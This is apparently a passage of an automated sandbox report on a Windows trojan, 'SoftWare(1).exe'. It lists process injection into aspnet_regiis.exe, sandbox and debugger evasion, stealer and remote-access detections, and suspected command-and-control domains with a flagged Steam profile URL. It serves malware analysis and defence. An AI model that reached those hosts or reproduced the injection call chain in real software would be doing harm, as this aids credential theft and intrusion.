    Source: C:\Users\user\Desktop\SoftWare(1).exeUnpacked PE file: 0.2.SoftWare(1).exe.dd0000.0.unpack 'H{_AE:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
    Source: SoftWare(1).exeStatic PE information: section name: 'H{_AE
    Source: SoftWare(1).exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1C9EE pushad ; ret 0_2_00E1C9EF
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1C6C8 push esi; ret 0_2_00E1C6D8
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E20F38 push ss; ret 0_2_00E20F58
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF6C0B1 push ecx; ret 0_2_6CF6C0C4
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005692E2 push esp; retf 2_2_005692E5
    Source: SoftWare(1).exeStatic PE information: section name: 'H{_AE entropy: 7.999398017019204
    Source: C:\Users\user\Desktop\SoftWare(1).exeFile created: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory allocated: 2F60000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory allocated: 50D0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory allocated: 5740000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory allocated: 6740000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory allocated: 6870000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory allocated: 7870000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory allocated: 7C00000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory allocated: 8C00000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory allocated: 9C00000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
    Source: C:\Users\user\Desktop\SoftWare(1).exe TID: 2000Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 2892Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF6556D FindFirstFileExW,0_2_6CF6556D
    Source: C:\Users\user\Desktop\SoftWare(1).exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: Amcache.hve.5.drBinary or memory string: VMware
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: aspnet_regiis.exe, 00000002.00000002.1972630357.000000000292C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1972630357.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_2-15511
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005907F0 LdrInitializeThunk,2_2_005907F0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF5F682 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CF5F682
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF66C90 GetProcessHeap,0_2_6CF66C90
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF5F157 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CF5F157
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF5F682 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CF5F682
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF6361C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CF6361C
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 550000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF4C4F0 GetGameData,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,0_2_6CF4C4F0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF4C4F0 GetGameData,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,0_2_6CF4C4F0
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 550000 value starts with: 4D5AJump to behavior
    Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: drawwyobstacw.sbs
    Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: condifendteu.sbs
    Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: ehticsprocw.sbs
    Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: vennurviot.sbs
    Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: resinedyw.sbs
    Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: enlargkiw.sbs
    Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: allocatinow.sbs
    Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: mathcucom.sbs
    Source: SoftWare(1).exe, 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: passimovrt.cfd
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 550000Jump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 551000Jump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 595000Jump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 598000Jump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 5A8000Jump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 272A008Jump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF5F848 cpuid 0_2_6CF5F848
    Source: C:\Users\user\Desktop\SoftWare(1).exeQueries volume information: C:\Users\user\Desktop\SoftWare(1).exe VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF5F2CB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CF5F2CB
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    511
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Screen Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Disable or Modify Tools
    LSASS Memory41
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
    Virtualization/Sandbox Evasion
    Security Account Manager41
    Virtualization/Sandbox Evasion
    SMB/Windows Admin Shares2
    Clipboard Data
    3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook511
    Process Injection
    NTDS1
    File and Directory Discovery
    Distributed Component Object ModelInput Capture114
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Deobfuscate/Decode Files or Information
    LSA Secrets33
    System Information Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
    Obfuscated Files or Information
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
    Software Packing
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    SoftWare(1).exe21%ReversingLabsWin32.Trojan.SpywareX
    SoftWare(1).exe33%VirustotalBrowse
    SoftWare(1).exe100%AviraHEUR/AGEN.1352236
    SoftWare(1).exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\msvcp110.dll100%Joe Sandbox ML
    No Antivirus matches
    SourceDetectionScannerLabelLink
    condifendteu.sbs18%VirustotalBrowse
    steamcommunity.com0%VirustotalBrowse
    vennurviot.sbs18%VirustotalBrowse
    drawwyobstacw.sbs18%VirustotalBrowse
    mathcucom.sbs21%VirustotalBrowse
    sergei-esenin.com18%VirustotalBrowse
    resinedyw.sbs18%VirustotalBrowse
    passimovrt.cfd0%VirustotalBrowse
    enlargkiw.sbs18%VirustotalBrowse
    ehticsprocw.sbs16%VirustotalBrowse
    allocatinow.sbs20%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://avatars.akamai.steamstatic0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
